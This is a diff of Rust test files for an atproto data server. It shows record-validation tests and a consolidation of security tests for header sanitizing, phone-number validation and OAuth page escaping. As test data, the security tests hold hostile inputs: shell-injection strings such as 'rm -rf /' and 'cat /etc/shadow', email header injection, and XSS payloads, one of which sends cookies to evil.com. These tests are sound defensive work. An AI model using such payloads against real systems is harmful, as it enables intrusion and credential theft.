empty_ok = json!({ 101 "$type": "app.bsky.actor.profile" 102 }); 103 + assert_eq!(validator.validate(&empty_ok, "app.bsky.actor.profile").unwrap(), ValidationStatus::Valid); 104 105 + let displayname_too_long = json!({ 106 "$type": "app.bsky.actor.profile", 107 + "displayName": "n".repeat(641) 108 }); 109 + assert!(matches!(validator.validate(&displayname_too_long, "app.bsky.actor.profile"), Err(ValidationError::InvalidField { path, .. }) if path == "displayName")); 110 111 + let description_too_long = json!({ 112 "$type": "app.bsky.actor.profile", 113 + "description": "d".repeat(2561) 114 }); 115 + assert!(matches!(validator.validate(&description_too_long, "app.bsky.actor.profile"), Err(ValidationError::InvalidField { path, .. }) if path == "description")); 116 } 117 118 #[test] 119 + fn test_like_and_repost_validation() { 120 let validator = RecordValidator::new(); 121 + 122 + let valid_like = json!({ 123 "$type": "app.bsky.feed.like", 124 "subject": { 125 "uri": "at://did:plc:test/app.bsky.feed.post/123", ··· 127 }, 128 "createdAt": now() 129 }); 130 + assert_eq!(validator.validate(&valid_like, "app.bsky.feed.like").unwrap(), ValidationStatus::Valid); 131 132 + let missing_subject = json!({ 133 "$type": "app.bsky.feed.like", 134 "createdAt": now() 135 }); 136 + assert!(matches!(validator.validate(&missing_subject, "app.bsky.feed.like"), Err(ValidationError::MissingField(f)) if f == "subject")); 137 138 + let missing_subject_uri = json!({ 139 "$type": "app.bsky.feed.like", 140 "subject": { 141 "cid": "bafyreig6xxxxxyyyyyzzzzzz" 142 }, 143 "createdAt": now() 144 }); 145 + assert!(matches!(validator.validate(&missing_subject_uri, "app.bsky.feed.like"), Err(ValidationError::MissingField(f)) if f.contains("uri"))); 146 147 + let invalid_subject_uri = json!({ 148 "$type": "app.bsky.feed.like", 149 "subject": { 150 "uri": "https://example.com/not-at-uri", ··· 152 }, 153 "createdAt": now() 154 }); 155 + assert!(matches!(validator.validate(&invalid_subject_uri, "app.bsky.feed.like"), Err(ValidationError::InvalidField { path, .. }) if path.contains("uri"))); 156 157 + let valid_repost = json!({ 158 "$type": "app.bsky.feed.repost", 159 "subject": { 160 "uri": "at://did:plc:test/app.bsky.feed.post/123", ··· 162 }, 163 "createdAt": now() 164 }); 165 + assert_eq!(validator.validate(&valid_repost, "app.bsky.feed.repost").unwrap(), ValidationStatus::Valid); 166 167 + let repost_missing_subject = json!({ 168 "$type": "app.bsky.feed.repost", 169 "createdAt": now() 170 }); 171 + assert!(matches!(validator.validate(&repost_missing_subject, "app.bsky.feed.repost"), Err(ValidationError::MissingField(f)) if f == "subject")); 172 } 173 174 #[test] 175 + fn test_follow_and_block_validation() { 176 let validator = RecordValidator::new(); 177 + 178 + let valid_follow = json!({ 179 "$type": "app.bsky.graph.follow", 180 "subject": "did:plc:test12345", 181 "createdAt": now() 182 }); 183 + assert_eq!(validator.validate(&valid_follow, "app.bsky.graph.follow").unwrap(), ValidationStatus::Valid); 184 185 + let missing_follow_subject = json!({ 186 "$type": "app.bsky.graph.follow", 187 "createdAt": now() 188 }); 189 + assert!(matches!(validator.validate(&missing_follow_subject, "app.bsky.graph.follow"), Err(ValidationError::MissingField(f)) if f == "subject")); 190 191 + let invalid_follow_subject = json!({ 192 "$type": "app.bsky.graph.follow", 193 "subject": "not-a-did", 194 "createdAt": now() 195 }); 196 + assert!(matches!(validator.validate(&invalid_follow_subject, "app.bsky.graph.follow"), Err(ValidationError::InvalidField { path, .. }) if path == "subject")); 197 198 + let valid_block = json!({ 199 "$type": "app.bsky.graph.block", 200 "subject": "did:plc:blocked123", 201 "createdAt": now() 202 }); 203 + assert_eq!(validator.validate(&valid_block, "app.bsky.graph.block").unwrap(), ValidationStatus::Valid); 204 205 + let invalid_block_subject = json!({ 206 "$type": "app.bsky.graph.block", 207 "subject": "not-a-did", 208 "createdAt": now() 209 }); 210 + assert!(matches!(validator.validate(&invalid_block_subject, "app.bsky.graph.block"), Err(ValidationError::InvalidField { path, .. }) if path == "subject")); 211 } 212 213 #[test] 214 + fn test_list_and_graph_records_validation() { 215 let validator = RecordValidator::new(); 216 + 217 + let valid_list = json!({ 218 "$type": "app.bsky.graph.list", 219 "name": "My List", 220 "purpose": "app.bsky.graph.defs#modlist", 221 "createdAt": now() 222 }); 223 + assert_eq!(validator.validate(&valid_list, "app.bsky.graph.list").unwrap(), ValidationStatus::Valid); 224 225 + let list_name_too_long = json!({ 226 "$type": "app.bsky.graph.list", 227 + "name": "n".repeat(65), 228 "purpose": "app.bsky.graph.defs#modlist", 229 "createdAt": now() 230 }); 231 + assert!(matches!(validator.validate(&list_name_too_long, "app.bsky.graph.list"), Err(ValidationError::InvalidField { path, .. }) if path == "name")); 232 233 + let list_empty_name = json!({ 234 "$type": "app.bsky.graph.list", 235 "name": "", 236 "purpose": "app.bsky.graph.defs#modlist", 237 "createdAt": now() 238 }); 239 + assert!(matches!(validator.validate(&list_empty_name, "app.bsky.graph.list"), Err(ValidationError::InvalidField { path, .. }) if path == "name")); 240 + 241 + let valid_list_item = json!({ 242 + "$type": "app.bsky.graph.listitem", 243 + "subject": "did:plc:test123", 244 + "list": "at://did:plc:owner/app.bsky.graph.list/mylist", 245 + "createdAt": now() 246 + }); 247 + assert_eq!(validator.validate(&valid_list_item, "app.bsky.graph.listitem").unwrap(), ValidationStatus::Valid); 248 } 249 250 #[test] 251 + fn test_misc_record_types_validation() { 252 let validator = RecordValidator::new(); 253 + 254 + let valid_generator = json!({ 255 "$type": "app.bsky.feed.generator", 256 "did": "did:web:example.com", 257 "displayName": "My Feed", 258 "createdAt": now() 259 }); 260 + assert_eq!(validator.validate(&valid_generator, "app.bsky.feed.generator").unwrap(), ValidationStatus::Valid); 261 262 + let generator_displayname_too_long = json!({ 263 "$type": "app.bsky.feed.generator", 264 "did": "did:web:example.com", 265 + "displayName": "f".repeat(241), 266 + "createdAt": now() 267 + }); 268 + assert!(matches!(validator.validate(&generator_displayname_too_long, "app.bsky.feed.generator"), Err(ValidationError::InvalidField { path, .. }) if path == "displayName")); 269 + 270 + let valid_threadgate = json!({ 271 + "$type": "app.bsky.feed.threadgate", 272 + "post": "at://did:plc:test/app.bsky.feed.post/123", 273 "createdAt": now() 274 }); 275 + assert_eq!(validator.validate(&valid_threadgate, "app.bsky.feed.threadgate").unwrap(), ValidationStatus::Valid); 276 277 + let valid_labeler = json!({ 278 + "$type": "app.bsky.labeler.service", 279 + "policies": { 280 + "labelValues": ["spam", "nsfw"] 281 + }, 282 + "createdAt": now() 283 }); 284 + assert_eq!(validator.validate(&valid_labeler, "app.bsky.labeler.service").unwrap(), ValidationStatus::Valid); 285 } 286 287 #[test] 288 + fn test_type_and_format_validation() { 289 + let validator = RecordValidator::new(); 290 + let strict_validator = RecordValidator::new().require_lexicon(true); 291 + 292 + let custom_record = json!({ 293 "$type": "com.custom.record", 294 "data": "test" 295 }); 296 + assert_eq!(validator.validate(&custom_record, "com.custom.record").unwrap(), ValidationStatus::Unknown); 297 + assert!(matches!(strict_validator.validate(&custom_record, "com.custom.record"), Err(ValidationError::UnknownType(_)))); 298 299 + let type_mismatch = json!({ 300 "$type": "app.bsky.feed.like", 301 "subject": {"uri": "at://test", "cid": "bafytest"}, 302 "createdAt": now() 303 }); 304 + assert!(matches!( 305 + validator.validate(&type_mismatch, "app.bsky.feed.post"), 306 + Err(ValidationError::TypeMismatch { expected, actual }) if expected == "app.bsky.feed.post" && actual == "app.bsky.feed.like" 307 + )); 308 309 + let missing_type = json!({ 310 "text": "Hello" 311 }); 312 + assert!(matches!(validator.validate(&missing_type, "app.bsky.feed.post"), Err(ValidationError::MissingType))); 313 314 + let not_object = json!("just a string"); 315 + assert!(matches!(validator.validate(&not_object, "app.bsky.feed.post"), Err(ValidationError::InvalidRecord(_)))); 316 317 + let valid_datetime = json!({ 318 "$type": "app.bsky.feed.post", 319 "text": "Test", 320 "createdAt": "2024-01-15T10:30:00.000Z" 321 }); 322 + assert_eq!(validator.validate(&valid_datetime, "app.bsky.feed.post").unwrap(), ValidationStatus::Valid); 323 324 + let datetime_with_offset = json!({ 325 "$type": "app.bsky.feed.post", 326 "text": "Test", 327 "createdAt": "2024-01-15T10:30:00+05:30" 328 }); 329 + assert_eq!(validator.validate(&datetime_with_offset, "app.bsky.feed.post").unwrap(), ValidationStatus::Valid); 330 331 + let invalid_datetime = json!({ 332 "$type": "app.bsky.feed.post", 333 "text": "Test", 334 "createdAt": "2024/01/15" 335 }); 336 + assert!(matches!(validator.validate(&invalid_datetime, "app.bsky.feed.post"), Err(ValidationError::InvalidDatetime { .. }))); 337 } 338 339 #[test] 340 + fn test_record_key_validation() { 341 assert!(validate_record_key("3k2n5j2").is_ok()); 342 assert!(validate_record_key("valid-key").is_ok()); 343 assert!(validate_record_key("valid_key").is_ok()); 344 assert!(validate_record_key("valid.key").is_ok()); 345 assert!(validate_record_key("valid~key").is_ok()); 346 assert!(validate_record_key("self").is_ok()); 347 348 + assert!(matches!(validate_record_key(""), Err(ValidationError::InvalidRecord(_)))); 349 350 assert!(validate_record_key(".").is_err()); 351 assert!(validate_record_key("..").is_err()); 352 353 assert!(validate_record_key("invalid/key").is_err()); 354 assert!(validate_record_key("invalid key").is_err()); 355 assert!(validate_record_key("invalid@key").is_err()); 356 assert!(validate_record_key("invalid#key").is_err()); 357 358 + assert!(matches!(validate_record_key(&"k".repeat(513)), Err(ValidationError::InvalidRecord(_)))); 359 + assert!(validate_record_key(&"k".repeat(512)).is_ok()); 360 } 361 362 #[test] 363 + fn test_collection_nsid_validation() { 364 assert!(validate_collection_nsid("app.bsky.feed.post").is_ok()); 365 assert!(validate_collection_nsid("com.atproto.repo.record").is_ok()); 366 assert!(validate_collection_nsid("a.b.c").is_ok()); 367 assert!(validate_collection_nsid("my-app.domain.record-type").is_ok()); 368 369 + assert!(matches!(validate_collection_nsid(""), Err(ValidationError::InvalidRecord(_)))); 370 371 assert!(validate_collection_nsid("a").is_err()); 372 assert!(validate_collection_nsid("a.b").is_err()); 373 374 assert!(validate_collection_nsid("a..b.c").is_err()); 375 assert!(validate_collection_nsid(".a.b.c").is_err()); 376 assert!(validate_collection_nsid("a.b.c.").is_err()); 377 378 assert!(validate_collection_nsid("a.b.c/d").is_err()); 379 assert!(validate_collection_nsid("a.b.c_d").is_err()); 380 assert!(validate_collection_nsid("a.b.c@d").is_err()); 381 }
+93 -380
tests/security_fixes.rs
··· 4 use bspds::oauth::templates::{error_page, login_page, success_page}; 5 6 #[test] 7 - fn test_sanitize_header_value_removes_crlf() { 8 let malicious = "Injected\r\nBcc: attacker@evil.com"; 9 let sanitized = sanitize_header_value(malicious); 10 - assert!(!sanitized.contains('\r'), "CR should be removed"); 11 - assert!(!sanitized.contains('\n'), "LF should be removed"); 12 - assert!( 13 - sanitized.contains("Injected"), 14 - "Original content should be preserved" 15 - ); 16 - assert!( 17 - sanitized.contains("Bcc:"), 18 - "Text after newline should be on same line (no header injection)" 19 - ); 20 - } 21 22 - #[test] 23 - fn test_sanitize_header_value_preserves_content() { 24 let normal = "Normal Subject Line"; 25 - let sanitized = sanitize_header_value(normal); 26 - assert_eq!(sanitized, "Normal Subject Line"); 27 - } 28 29 - #[test] 30 - fn test_sanitize_header_value_trims_whitespace() { 31 let padded = " Subject "; 32 - let sanitized = sanitize_header_value(padded); 33 - assert_eq!(sanitized, "Subject"); 34 - } 35 36 - #[test] 37 - fn test_sanitize_header_value_handles_multiple_newlines() { 38 - let input = "Line1\r\nLine2\nLine3\rLine4"; 39 - let sanitized = sanitize_header_value(input); 40 - assert!(!sanitized.contains('\r'), "CR should be removed"); 41 - assert!(!sanitized.contains('\n'), "LF should be removed"); 42 - assert!( 43 - sanitized.contains("Line1"), 44 - "Content before newlines preserved" 45 - ); 46 - assert!( 47 - sanitized.contains("Line4"), 48 - "Content after newlines preserved" 49 - ); 50 - } 51 52 - #[test] 53 - fn test_email_header_injection_sanitization() { 54 let header_injection = "Normal Subject\r\nBcc: attacker@evil.com\r\nX-Injected: value"; 55 let sanitized = sanitize_header_value(header_injection); 56 - let lines: Vec<&str> = sanitized.split("\r\n").collect(); 57 - assert_eq!(lines.len(), 1, "Should be a single line after sanitization"); 58 - assert!( 59 - sanitized.contains("Normal Subject"), 60 - "Original content preserved" 61 - ); 62 - assert!( 63 - sanitized.contains("Bcc:"), 64 - "Content after CRLF preserved as same line text" 65 - ); 66 - assert!( 67 - sanitized.contains("X-Injected:"), 68 - "All content on same line" 69 - ); 70 } 71 72 #[test] 73 - fn test_valid_phone_number_accepts_correct_format() { 74 assert!(is_valid_phone_number("+1234567890")); 75 assert!(is_valid_phone_number("+12025551234")); 76 assert!(is_valid_phone_number("+442071234567")); 77 assert!(is_valid_phone_number("+4915123456789")); 78 assert!(is_valid_phone_number("+1")); 79 - } 80 81 - #[test] 82 - fn test_valid_phone_number_rejects_missing_plus() { 83 assert!(!is_valid_phone_number("1234567890")); 84 assert!(!is_valid_phone_number("12025551234")); 85 - } 86 - 87 - #[test] 88 - fn test_valid_phone_number_rejects_empty() { 89 assert!(!is_valid_phone_number("")); 90 - } 91 - 92 - #[test] 93 - fn test_valid_phone_number_rejects_just_plus() { 94 assert!(!is_valid_phone_number("+")); 95 - } 96 - 97 - #[test] 98 - fn test_valid_phone_number_rejects_too_long() { 99 assert!(!is_valid_phone_number("+12345678901234567890123")); 100 - } 101 102 - #[test] 103 - fn test_valid_phone_number_rejects_letters() { 104 assert!(!is_valid_phone_number("+abc123")); 105 assert!(!is_valid_phone_number("+1234abc")); 106 assert!(!is_valid_phone_number("+a")); 107 - } 108 109 - #[test] 110 - fn test_valid_phone_number_rejects_spaces() { 111 assert!(!is_valid_phone_number("+1234 5678")); 112 assert!(!is_valid_phone_number("+ 1234567890")); 113 assert!(!is_valid_phone_number("+1 ")); 114 - } 115 116 - #[test] 117 - fn test_valid_phone_number_rejects_special_chars() { 118 assert!(!is_valid_phone_number("+123-456-7890")); 119 assert!(!is_valid_phone_number("+1(234)567890")); 120 assert!(!is_valid_phone_number("+1.234.567.890")); 121 - } 122 123 - #[test] 124 - fn test_signal_recipient_command_injection_blocked() { 125 - let malicious_inputs = vec![ 126 - "+123; rm -rf /", 127 - "+123 && cat /etc/passwd", 128 - "+123`id`", 129 - "+123$(whoami)", 130 - "+123|cat /etc/shadow", 131 - "+123\n--help", 132 - "+123\r\n--version", 133 - "+123--help", 134 - ]; 135 - for input in malicious_inputs { 136 - assert!( 137 - !is_valid_phone_number(input), 138 - "Malicious input '{}' should be rejected", 139 - input 140 - ); 141 } 142 } 143 144 #[test] 145 - fn test_image_file_size_limit_enforced() { 146 let processor = ImageProcessor::new(); 147 let oversized_data: Vec<u8> = vec![0u8; 11 * 1024 * 1024]; 148 let result = processor.process(&oversized_data, "image/jpeg"); ··· 156 } 157 Ok(_) => panic!("Should reject files over size limit"), 158 } 159 - } 160 161 - #[test] 162 - fn test_image_file_size_limit_configurable() { 163 let processor = ImageProcessor::new().with_max_file_size(1024); 164 let data: Vec<u8> = vec![0u8; 2048]; 165 - let result = processor.process(&data, "image/jpeg"); 166 - assert!(result.is_err(), "Should reject files over configured limit"); 167 } 168 169 #[test] 170 - fn test_oauth_template_xss_escaping_client_id() { 171 - let malicious_client_id = "<script>alert('xss')</script>"; 172 - let html = login_page(malicious_client_id, None, None, "test-uri", None, None); 173 - assert!(!html.contains("<script>"), "Script tags should be escaped"); 174 - assert!( 175 - html.contains("&lt;script&gt;"), 176 - "HTML entities should be used for escaping" 177 - ); 178 - } 179 180 - #[test] 181 - fn test_oauth_template_xss_escaping_client_name() { 182 - let malicious_client_name = "<img src=x onerror=alert('xss')>"; 183 - let html = login_page( 184 - "client123", 185 - Some(malicious_client_name), 186 - None, 187 - "test-uri", 188 - None, 189 - None, 190 - ); 191 - assert!(!html.contains("<img "), "IMG tags should be escaped"); 192 - assert!( 193 - html.contains("&lt;img"), 194 - "IMG tag should be escaped as HTML entity" 195 - ); 196 - } 197 198 - #[test] 199 - fn test_oauth_template_xss_escaping_scope() { 200 - let malicious_scope = "\"><script>alert('xss')</script>"; 201 - let html = login_page( 202 - "client123", 203 - None, 204 - Some(malicious_scope), 205 - "test-uri", 206 - None, 207 - None, 208 - ); 209 - assert!( 210 - !html.contains("<script>"), 211 - "Script tags in scope should be escaped" 212 - ); 213 - } 214 215 - #[test] 216 - fn test_oauth_template_xss_escaping_error_message() { 217 - let malicious_error = "<script>document.location='http://evil.com?c='+document.cookie</script>"; 218 - let html = login_page( 219 - "client123", 220 - None, 221 - None, 222 - "test-uri", 223 - Some(malicious_error), 224 - None, 225 - ); 226 - assert!( 227 - !html.contains("<script>"), 228 - "Script tags in error should be escaped" 229 - ); 230 } 231 232 #[test] 233 - fn test_oauth_template_xss_escaping_login_hint() { 234 - let malicious_hint = "\" onfocus=\"alert('xss')\" autofocus=\""; 235 - let html = login_page( 236 - "client123", 237 - None, 238 - None, 239 - "test-uri", 240 - None, 241 - Some(malicious_hint), 242 - ); 243 - assert!( 244 - !html.contains("onfocus=\"alert"), 245 - "Event handlers should be escaped in login hint" 246 - ); 247 - assert!(html.contains("&quot;"), "Quotes should be escaped"); 248 - } 249 250 - #[test] 251 - fn test_oauth_template_xss_escaping_request_uri() { 252 - let malicious_uri = "\" onmouseover=\"alert('xss')\""; 253 - let html = login_page("client123", None, None, malicious_uri, None, None); 254 - assert!( 255 - !html.contains("onmouseover=\"alert"), 256 - "Event handlers should be escaped in request_uri" 257 - ); 258 - } 259 260 - #[test] 261 - fn test_oauth_error_page_xss_escaping() { 262 - let malicious_error = "<script>steal()</script>"; 263 - let malicious_desc = "<img src=x onerror=evil()>"; 264 - let html = error_page(malicious_error, Some(malicious_desc)); 265 - assert!( 266 - !html.contains("<script>"), 267 - "Script tags should be escaped in error page" 268 - ); 269 - assert!( 270 - !html.contains("<img "), 271 - "IMG tags should be escaped in error page" 272 - ); 273 - } 274 275 - #[test] 276 - fn test_oauth_success_page_xss_escaping() { 277 - let malicious_name = "<script>steal_session()</script>"; 278 - let html = success_page(Some(malicious_name)); 279 - assert!( 280 - !html.contains("<script>"), 281 - "Script tags should be escaped in success page" 282 - ); 283 - } 284 285 - #[test] 286 - fn test_oauth_template_no_javascript_urls() { 287 - let html = login_page("client123", None, None, "test-uri", None, None); 288 - assert!( 289 - !html.contains("javascript:"), 290 - "Login page should not contain javascript: URLs" 291 - ); 292 - let error_html = error_page("test_error", None); 293 - assert!( 294 - !error_html.contains("javascript:"), 295 - "Error page should not contain javascript: URLs" 296 - ); 297 - let success_html = success_page(None); 298 - assert!( 299 - !success_html.contains("javascript:"), 300 - "Success page should not contain javascript: URLs" 301 - ); 302 - } 303 304 - #[test] 305 - fn test_oauth_template_form_action_safe() { 306 - let malicious_uri = "javascript:alert('xss')//"; 307 - let html = login_page("client123", None, None, malicious_uri, None, None); 308 - assert!( 309 - html.contains("action=\"/oauth/authorize\""), 310 - "Form action should be fixed URL" 311 - ); 312 } 313 314 #[test] 315 - fn test_send_error_types_have_display() { 316 let timeout = SendError::Timeout; 317 - let max_retries = SendError::MaxRetriesExceeded("test".to_string()); 318 - let invalid_recipient = SendError::InvalidRecipient("bad recipient".to_string()); 319 assert!(!format!("{}", timeout).is_empty()); 320 - assert!(!format!("{}", max_retries).is_empty()); 321 - assert!(!format!("{}", invalid_recipient).is_empty()); 322 - } 323 324 - #[test] 325 - fn test_send_error_timeout_message() { 326 - let error = SendError::Timeout; 327 - let msg = format!("{}", error); 328 - assert!( 329 - msg.to_lowercase().contains("timeout"), 330 - "Timeout error should mention timeout" 331 - ); 332 - } 333 334 - #[test] 335 - fn test_send_error_max_retries_includes_detail() { 336 - let error = SendError::MaxRetriesExceeded("Server returned 503".to_string()); 337 - let msg = format!("{}", error); 338 - assert!( 339 - msg.contains("503") || msg.contains("retries"), 340 - "MaxRetriesExceeded should include context" 341 - ); 342 } 343 344 #[tokio::test] 345 - async fn test_check_signup_queue_accepts_session_jwt() { 346 use common::{base_url, client, create_account_and_login}; 347 let base = base_url().await; 348 let http_client = client(); 349 - let (token, _did) = create_account_and_login(&http_client).await; 350 - let res = http_client 351 - .get(format!("{}/xrpc/com.atproto.temp.checkSignupQueue", base)) 352 - .header("Authorization", format!("Bearer {}", token)) 353 - .send() 354 - .await 355 - .unwrap(); 356 - assert_eq!( 357 - res.status(), 358 - reqwest::StatusCode::OK, 359 - "Session JWTs should be accepted" 360 - ); 361 let body: serde_json::Value = res.json().await.unwrap(); 362 assert_eq!(body["activated"], true); 363 - } 364 365 - #[tokio::test] 366 - async fn test_check_signup_queue_no_auth() { 367 - use common::{base_url, client}; 368 - let base = base_url().await; 369 - let http_client = client(); 370 - let res = http_client 371 - .get(format!("{}/xrpc/com.atproto.temp.checkSignupQueue", base)) 372 - .send() 373 - .await 374 - .unwrap(); 375 - assert_eq!(res.status(), reqwest::StatusCode::OK, "No auth should work"); 376 let body: serde_json::Value = res.json().await.unwrap(); 377 assert_eq!(body["activated"], true); 378 } 379 - 380 - #[test] 381 - fn test_html_escape_ampersand() { 382 - let html = login_page("client&test", None, None, "test-uri", None, None); 383 - assert!(html.contains("&amp;"), "Ampersand should be escaped"); 384 - assert!( 385 - !html.contains("client&test"), 386 - "Raw ampersand should not appear in output" 387 - ); 388 - } 389 - 390 - #[test] 391 - fn test_html_escape_quotes() { 392 - let html = login_page("client\"test'more", None, None, "test-uri", None, None); 393 - assert!( 394 - html.contains("&quot;") || html.contains("&#34;"), 395 - "Double quotes should be escaped" 396 - ); 397 - assert!( 398 - html.contains("&#39;") || html.contains("&apos;"), 399 - "Single quotes should be escaped" 400 - ); 401 - } 402 - 403 - #[test] 404 - fn test_html_escape_angle_brackets() { 405 - let html = login_page("client<test>more", None, None, "test-uri", None, None); 406 - assert!(html.contains("&lt;"), "Less than should be escaped"); 407 - assert!(html.contains("&gt;"), "Greater than should be escaped"); 408 - assert!( 409 - !html.contains("<test>"), 410 - "Raw angle brackets should not appear" 411 - ); 412 - } 413 - 414 - #[test] 415 - fn test_oauth_template_preserves_safe_content() { 416 - let html = login_page( 417 - "my-safe-client", 418 - Some("My Safe App"), 419 - Some("read write"), 420 - "valid-uri", 421 - None, 422 - Some("user@example.com"), 423 - ); 424 - assert!( 425 - html.contains("my-safe-client") || html.contains("My Safe App"), 426 - "Safe content should be preserved" 427 - ); 428 - assert!( 429 - html.contains("read write") || html.contains("read"), 430 - "Scope should be preserved" 431 - ); 432 - assert!( 433 - html.contains("user@example.com"), 434 - "Login hint should be preserved" 435 - ); 436 - } 437 - 438 - #[test] 439 - fn test_csrf_like_input_value_protection() { 440 - let malicious = "\" onclick=\"alert('csrf')"; 441 - let html = login_page("client", None, None, malicious, None, None); 442 - assert!( 443 - !html.contains("onclick=\"alert"), 444 - "Event handlers should not be executable" 445 - ); 446 - } 447 - 448 - #[test] 449 - fn test_unicode_handling_in_templates() { 450 - let unicode_client = "客户端 クライアント"; 451 - let html = login_page(unicode_client, None, None, "test-uri", None, None); 452 - assert!( 453 - html.contains("客户端") || html.contains("&#"), 454 - "Unicode should be preserved or encoded" 455 - ); 456 - } 457 - 458 - #[test] 459 - fn test_null_byte_in_input() { 460 - let with_null = "client\0id"; 461 - let sanitized = sanitize_header_value(with_null); 462 - assert!( 463 - sanitized.contains("client"), 464 - "Content before null should be preserved" 465 - ); 466 - } 467 - 468 - #[test] 469 - fn test_very_long_input_handling() { 470 - let long_input = "x".repeat(10000); 471 - let sanitized = sanitize_header_value(&long_input); 472 - assert!( 473 - !sanitized.is_empty(), 474 - "Long input should still produce output" 475 - ); 476 - }
··· 4 use bspds::oauth::templates::{error_page, login_page, success_page}; 5 6 #[test] 7 + fn test_header_injection_sanitization() { 8 let malicious = "Injected\r\nBcc: attacker@evil.com"; 9 let sanitized = sanitize_header_value(malicious); 10 + assert!(!sanitized.contains('\r') && !sanitized.contains('\n')); 11 + assert!(sanitized.contains("Injected") && sanitized.contains("Bcc:")); 12 13 let normal = "Normal Subject Line"; 14 + assert_eq!(sanitize_header_value(normal), "Normal Subject Line"); 15 16 let padded = " Subject "; 17 + assert_eq!(sanitize_header_value(padded), "Subject"); 18 19 + let multi_newline = "Line1\r\nLine2\nLine3\rLine4"; 20 + let sanitized = sanitize_header_value(multi_newline); 21 + assert!(!sanitized.contains('\r') && !sanitized.contains('\n')); 22 + assert!(sanitized.contains("Line1") && sanitized.contains("Line4")); 23 24 let header_injection = "Normal Subject\r\nBcc: attacker@evil.com\r\nX-Injected: value"; 25 let sanitized = sanitize_header_value(header_injection); 26 + assert_eq!(sanitized.split("\r\n").count(), 1); 27 + assert!(sanitized.contains("Normal Subject") && sanitized.contains("Bcc:") && sanitized.contains("X-Injected:")); 28 + 29 + let with_null = "client\0id"; 30 + assert!(sanitize_header_value(with_null).contains("client")); 31 + 32 + let long_input = "x".repeat(10000); 33 + assert!(!sanitize_header_value(&long_input).is_empty()); 34 } 35 36 #[test] 37 + fn test_phone_number_validation() { 38 assert!(is_valid_phone_number("+1234567890")); 39 assert!(is_valid_phone_number("+12025551234")); 40 assert!(is_valid_phone_number("+442071234567")); 41 assert!(is_valid_phone_number("+4915123456789")); 42 assert!(is_valid_phone_number("+1")); 43 44 assert!(!is_valid_phone_number("1234567890")); 45 assert!(!is_valid_phone_number("12025551234")); 46 assert!(!is_valid_phone_number("")); 47 assert!(!is_valid_phone_number("+")); 48 assert!(!is_valid_phone_number("+12345678901234567890123")); 49 50 assert!(!is_valid_phone_number("+abc123")); 51 assert!(!is_valid_phone_number("+1234abc")); 52 assert!(!is_valid_phone_number("+a")); 53 54 assert!(!is_valid_phone_number("+1234 5678")); 55 assert!(!is_valid_phone_number("+ 1234567890")); 56 assert!(!is_valid_phone_number("+1 ")); 57 58 assert!(!is_valid_phone_number("+123-456-7890")); 59 assert!(!is_valid_phone_number("+1(234)567890")); 60 assert!(!is_valid_phone_number("+1.234.567.890")); 61 62 + for malicious in ["+123; rm -rf /", "+123 && cat /etc/passwd", "+123`id`", 63 + "+123$(whoami)", "+123|cat /etc/shadow", "+123\n--help", 64 + "+123\r\n--version", "+123--help"] { 65 + assert!(!is_valid_phone_number(malicious), "Command injection '{}' should be rejected", malicious); 66 } 67 } 68 69 #[test] 70 + fn test_image_file_size_limits() { 71 let processor = ImageProcessor::new(); 72 let oversized_data: Vec<u8> = vec![0u8; 11 * 1024 * 1024]; 73 let result = processor.process(&oversized_data, "image/jpeg"); ··· 81 } 82 Ok(_) => panic!("Should reject files over size limit"), 83 } 84 85 let processor = ImageProcessor::new().with_max_file_size(1024); 86 let data: Vec<u8> = vec![0u8; 2048]; 87 + assert!(processor.process(&data, "image/jpeg").is_err()); 88 } 89 90 #[test] 91 + fn test_oauth_template_xss_protection() { 92 + let html = login_page("<script>alert('xss')</script>", None, None, "test-uri", None, None); 93 + assert!(!html.contains("<script>") && html.contains("&lt;script&gt;")); 94 95 + let html = login_page("client123", Some("<img src=x onerror=alert('xss')>"), None, "test-uri", None, None); 96 + assert!(!html.contains("<img ") && html.contains("&lt;img")); 97 98 + let html = login_page("client123", None, Some("\"><script>alert('xss')</script>"), "test-uri", None, None); 99 + assert!(!html.contains("<script>")); 100 101 + let html = login_page("client123", None, None, "test-uri", 102 + Some("<script>document.location='http://evil.com?c='+document.cookie</script>"), None); 103 + assert!(!html.contains("<script>")); 104 + 105 + let html = login_page("client123", None, None, "test-uri", None, 106 + Some("\" onfocus=\"alert('xss')\" autofocus=\"")); 107 + assert!(!html.contains("onfocus=\"alert") && html.contains("&quot;")); 108 + 109 + let html = login_page("client123", None, None, "\" onmouseover=\"alert('xss')\"", None, None); 110 + assert!(!html.contains("onmouseover=\"alert")); 111 + 112 + let html = error_page("<script>steal()</script>", Some("<img src=x onerror=evil()>")); 113 + assert!(!html.contains("<script>") && !html.contains("<img ")); 114 + 115 + let html = success_page(Some("<script>steal_session()</script>")); 116 + assert!(!html.contains("<script>")); 117 + 118 + for (page, name) in [ 119 + (login_page("client", None, None, "uri", None, None), "login"), 120 + (error_page("err", None), "error"), 121 + (success_page(None), "success"), 122 + ] { 123 + assert!(!page.contains("javascript:"), "{} page has javascript: URL", name); 124 + } 125 + 126 + let html = login_page("client123", None, None, "javascript:alert('xss')//", None, None); 127 + assert!(html.contains("action=\"/oauth/authorize\"")); 128 } 129 130 #[test] 131 + fn test_oauth_template_html_escaping() { 132 + let html = login_page("client&test", None, None, "test-uri", None, None); 133 + assert!(html.contains("&amp;") && !html.contains("client&test")); 134 135 + let html = login_page("client\"test'more", None, None, "test-uri", None, None); 136 + assert!(html.contains("&quot;") || html.contains("&#34;")); 137 + assert!(html.contains("&#39;") || html.contains("&apos;")); 138 139 + let html = login_page("client<test>more", None, None, "test-uri", None, None); 140 + assert!(html.contains("&lt;") && html.contains("&gt;") && !html.contains("<test>")); 141 142 + let html = login_page("my-safe-client", Some("My Safe App"), Some("read write"), 143 + "valid-uri", None, Some("user@example.com")); 144 + assert!(html.contains("my-safe-client") || html.contains("My Safe App")); 145 + assert!(html.contains("read write") || html.contains("read")); 146 + assert!(html.contains("user@example.com")); 147 148 + let html = login_page("client", None, None, "\" onclick=\"alert('csrf')", None, None); 149 + assert!(!html.contains("onclick=\"alert")); 150 151 + let html = login_page("客户端 クライアント", None, None, "test-uri", None, None); 152 + assert!(html.contains("客户端") || html.contains("&#")); 153 } 154 155 #[test] 156 + fn test_send_error_display() { 157 let timeout = SendError::Timeout; 158 assert!(!format!("{}", timeout).is_empty()); 159 + assert!(format!("{}", timeout).to_lowercase().contains("timeout")); 160 161 + let max_retries = SendError::MaxRetriesExceeded("Server returned 503".to_string()); 162 + let msg = format!("{}", max_retries); 163 + assert!(!msg.is_empty()); 164 + assert!(msg.contains("503") || msg.contains("retries")); 165 166 + let invalid = SendError::InvalidRecipient("bad recipient".to_string()); 167 + assert!(!format!("{}", 